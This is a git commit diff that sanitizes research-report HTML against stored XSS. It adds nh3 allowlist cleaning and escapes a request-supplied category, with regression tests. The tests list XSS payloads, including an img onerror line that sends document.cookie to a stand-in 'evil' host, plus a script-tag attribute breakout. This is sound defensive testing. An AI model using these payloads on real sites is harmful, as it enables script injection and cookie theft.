security: sanitize rendered research-report HTML (#364)
The visual research report is assembled from LLM output over crawled web
pages (untrusted content) and served under a relaxed `script-src
'unsafe-inline'` CSP. Two values reached that HTML without sanitization:
- `_md_to_html` rendered the report markdown via python-markdown, which
passes raw HTML through verbatim, so `<script>` / `<img onerror>` /
`<svg onload>` / `javascript:` links carried in crawled content ran in
the app origin.
- `category` (from the /api/research/start request body, no enum check) was
interpolated raw into `<body class="category-{category}">`.
Allowlist-sanitize the rendered markdown with nh3, keeping the formatting
the report emits (tables, code, details/summary, toc anchors, codehilite
classes, external-link target/rel) while dropping active content, and
html.escape the category. Adds regression tests.
This commit is contained in:
@@ -21,6 +21,10 @@ youtube-transcript-api
|
|||||||
# Markdown rendering for research reports (src/visual_report.py).
|
# Markdown rendering for research reports (src/visual_report.py).
|
||||||
# Imported at module-top so it's a hard core dep, not optional.
|
# Imported at module-top so it's a hard core dep, not optional.
|
||||||
markdown
|
markdown
|
||||||
|
# HTML sanitizer for rendered research reports (src/visual_report.py). Report
|
||||||
|
# content is untrusted (LLM output over crawled pages) and report pages run
|
||||||
|
# under a relaxed CSP, so the rendered HTML is allowlist-sanitized.
|
||||||
|
nh3
|
||||||
# Calendar .ics import/export (routes/calendar_routes.py).
|
# Calendar .ics import/export (routes/calendar_routes.py).
|
||||||
icalendar
|
icalendar
|
||||||
# Recurrence rule expansion for calendar events (routes/calendar_routes.py).
|
# Recurrence rule expansion for calendar events (routes/calendar_routes.py).
|
||||||
|
|||||||
@@ -25,9 +25,27 @@ from src.research_utils import strip_thinking
|
|||||||
from urllib.parse import urlparse
|
from urllib.parse import urlparse
|
||||||
|
|
||||||
import markdown
|
import markdown
|
||||||
|
import nh3
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
# Tags/attributes permitted in rendered research-report HTML. Starts from nh3's
|
||||||
|
# safe defaults (which drop <script>, inline event handlers, and javascript:
|
||||||
|
# URLs) and adds back only the formatting the report itself emits: the
|
||||||
|
# collapsible raw-findings block (<details>/<summary>), heading anchors for the
|
||||||
|
# table of contents (id), codehilite classes, table alignment, and the
|
||||||
|
# target/rel that _md_to_html puts on external links.
|
||||||
|
_REPORT_ALLOWED_TAGS = set(nh3.ALLOWED_TAGS) | {"details", "summary"}
|
||||||
|
_REPORT_ALLOWED_ATTRS = {k: set(v) for k, v in nh3.ALLOWED_ATTRIBUTES.items()}
|
||||||
|
for _h in ("h1", "h2", "h3", "h4", "h5", "h6"):
|
||||||
|
_REPORT_ALLOWED_ATTRS.setdefault(_h, set()).add("id")
|
||||||
|
for _t in ("span", "code", "pre", "div", "table", "td", "th"):
|
||||||
|
_REPORT_ALLOWED_ATTRS.setdefault(_t, set()).add("class")
|
||||||
|
for _t in ("td", "th"):
|
||||||
|
_REPORT_ALLOWED_ATTRS.setdefault(_t, set()).add("align")
|
||||||
|
_REPORT_ALLOWED_ATTRS.setdefault("a", set()).update({"href", "title", "target", "rel"})
|
||||||
|
_REPORT_ALLOWED_ATTRS.setdefault("img", set()).update({"src", "alt", "title"})
|
||||||
|
|
||||||
# ---------------------------------------------------------------------------
|
# ---------------------------------------------------------------------------
|
||||||
# Helpers
|
# Helpers
|
||||||
# ---------------------------------------------------------------------------
|
# ---------------------------------------------------------------------------
|
||||||
@@ -48,7 +66,14 @@ def _autolink_urls(md_text: str) -> str:
|
|||||||
|
|
||||||
|
|
||||||
def _md_to_html(md_text: str) -> str:
|
def _md_to_html(md_text: str) -> str:
|
||||||
"""Convert markdown to HTML with common extensions."""
|
"""Convert markdown to HTML with common extensions.
|
||||||
|
|
||||||
|
Research-report markdown is assembled from LLM output over crawled web
|
||||||
|
pages (untrusted content), and report pages are served under a relaxed
|
||||||
|
`script-src 'unsafe-inline'` CSP. python-markdown passes raw HTML through
|
||||||
|
verbatim, so the rendered output is allowlist-sanitized to strip any
|
||||||
|
<script>/inline-event-handler/javascript: markup before it reaches the page.
|
||||||
|
"""
|
||||||
md_text = _autolink_urls(md_text)
|
md_text = _autolink_urls(md_text)
|
||||||
result = markdown.markdown(
|
result = markdown.markdown(
|
||||||
md_text,
|
md_text,
|
||||||
@@ -64,6 +89,14 @@ def _md_to_html(md_text: str) -> str:
|
|||||||
r'<a target="_blank" rel="noopener noreferrer" href="\1',
|
r'<a target="_blank" rel="noopener noreferrer" href="\1',
|
||||||
result,
|
result,
|
||||||
)
|
)
|
||||||
|
# Sanitize: report content is untrusted and the report CSP allows inline
|
||||||
|
# scripts, so strip active content while keeping the formatting above.
|
||||||
|
result = nh3.clean(
|
||||||
|
result,
|
||||||
|
tags=_REPORT_ALLOWED_TAGS,
|
||||||
|
attributes=_REPORT_ALLOWED_ATTRS,
|
||||||
|
link_rel=None,
|
||||||
|
)
|
||||||
return result
|
return result
|
||||||
|
|
||||||
|
|
||||||
@@ -1864,7 +1897,7 @@ def generate_visual_report(
|
|||||||
restore_btn_html=restore_btn_html,
|
restore_btn_html=restore_btn_html,
|
||||||
timestamp=timestamp,
|
timestamp=timestamp,
|
||||||
category_css=_category_css(category),
|
category_css=_category_css(category),
|
||||||
body_class=f"category-{category}" if category else "",
|
body_class=f"category-{html.escape(str(category))}" if category else "",
|
||||||
session_id_js=json_dumps_str(session_id or ""),
|
session_id_js=json_dumps_str(session_id or ""),
|
||||||
spare_images_js=_json_for_script(spare_images),
|
spare_images_js=_json_for_script(spare_images),
|
||||||
)
|
)
|
||||||
|
|||||||
@@ -1041,3 +1041,70 @@ def test_chat_active_document_lookup_is_owner_scoped():
|
|||||||
assert "filter( DBDocument.id == active_doc_id, ).first()" not in flat
|
assert "filter( DBDocument.id == active_doc_id, ).first()" not in flat
|
||||||
assert "filter(DBDocument.id == active_doc_id).first()" not in flat
|
assert "filter(DBDocument.id == active_doc_id).first()" not in flat
|
||||||
assert "filter(DBDocument.id == _mem_id).first()" not in flat
|
assert "filter(DBDocument.id == _mem_id).first()" not in flat
|
||||||
|
|
||||||
|
|
||||||
|
# ── research report HTML sanitization (visual report stored XSS) ──
|
||||||
|
#
|
||||||
|
# `src.visual_report._md_to_html` renders the deep-research report, whose
|
||||||
|
# markdown is built from LLM output over crawled web pages (untrusted content).
|
||||||
|
# python-markdown passes raw HTML through verbatim, and report pages are served
|
||||||
|
# under a relaxed `script-src 'unsafe-inline'` CSP, so any markup surviving into
|
||||||
|
# the report would execute in the app origin. The render must allowlist-sanitize.
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("payload", [
|
||||||
|
"<script>alert(document.domain)</script>",
|
||||||
|
'<img src=x onerror="fetch(\'//evil/\'+document.cookie)">',
|
||||||
|
"<svg onload=alert(1)>",
|
||||||
|
'<a href="javascript:alert(1)">x</a>',
|
||||||
|
])
|
||||||
|
def test_md_to_html_strips_active_content(payload):
|
||||||
|
from src.visual_report import _md_to_html
|
||||||
|
|
||||||
|
out = _md_to_html(f"Report body.\n\n{payload}").lower()
|
||||||
|
|
||||||
|
assert "<script" not in out
|
||||||
|
assert "onerror=" not in out
|
||||||
|
assert "onload=" not in out
|
||||||
|
assert "javascript:" not in out
|
||||||
|
|
||||||
|
|
||||||
|
def test_md_to_html_preserves_normal_report_formatting():
|
||||||
|
from src.visual_report import _md_to_html
|
||||||
|
|
||||||
|
md = (
|
||||||
|
"## Findings\n\n"
|
||||||
|
"**bold** and a [source](https://example.com/p).\n\n"
|
||||||
|
"| A | B |\n|---|---|\n| 1 | 2 |\n\n"
|
||||||
|
"```python\ndef x():\n return 1\n```\n\n"
|
||||||
|
"<details>\n<summary>Raw findings</summary>\n\ncontent\n</details>\n"
|
||||||
|
)
|
||||||
|
out = _md_to_html(md)
|
||||||
|
|
||||||
|
assert "<h2 id=" in out # heading + toc anchor preserved
|
||||||
|
assert "<table" in out and "<td" in out # table
|
||||||
|
assert "<pre" in out and "<code" in out # fenced code block
|
||||||
|
assert "<details" in out and "<summary" in out # collapsible raw-findings section
|
||||||
|
assert 'href="https://example.com/p"' in out # external link kept
|
||||||
|
assert 'rel="noopener' in out # ...and rel-hardened
|
||||||
|
|
||||||
|
|
||||||
|
def test_visual_report_escapes_request_category():
|
||||||
|
# `category` arrives straight from the /api/research/start request body with
|
||||||
|
# no enum validation and lands in <body class="category-{category}"> on a
|
||||||
|
# report page served under `script-src 'unsafe-inline'`, so it must be escaped
|
||||||
|
# or it's an attribute-injection XSS independent of the markdown body.
|
||||||
|
from src.visual_report import generate_visual_report
|
||||||
|
|
||||||
|
html = generate_visual_report(
|
||||||
|
question="q",
|
||||||
|
report_markdown="## H\n\nbody",
|
||||||
|
category='"><script>alert(document.domain)</script>',
|
||||||
|
)
|
||||||
|
|
||||||
|
assert "<script>alert(document.domain)" not in html # no breakout
|
||||||
|
assert "<script>" in html # rendered as inert text
|
||||||
|
|
||||||
|
# `category` has no type check at the request boundary, so a non-string
|
||||||
|
# value must coerce rather than crash the render (html.escape needs a str).
|
||||||
|
out = generate_visual_report(question="q", report_markdown="## H", category=12345)
|
||||||
|
assert "category-12345" in out
|
||||||
|
|||||||
Reference in New Issue
Block a user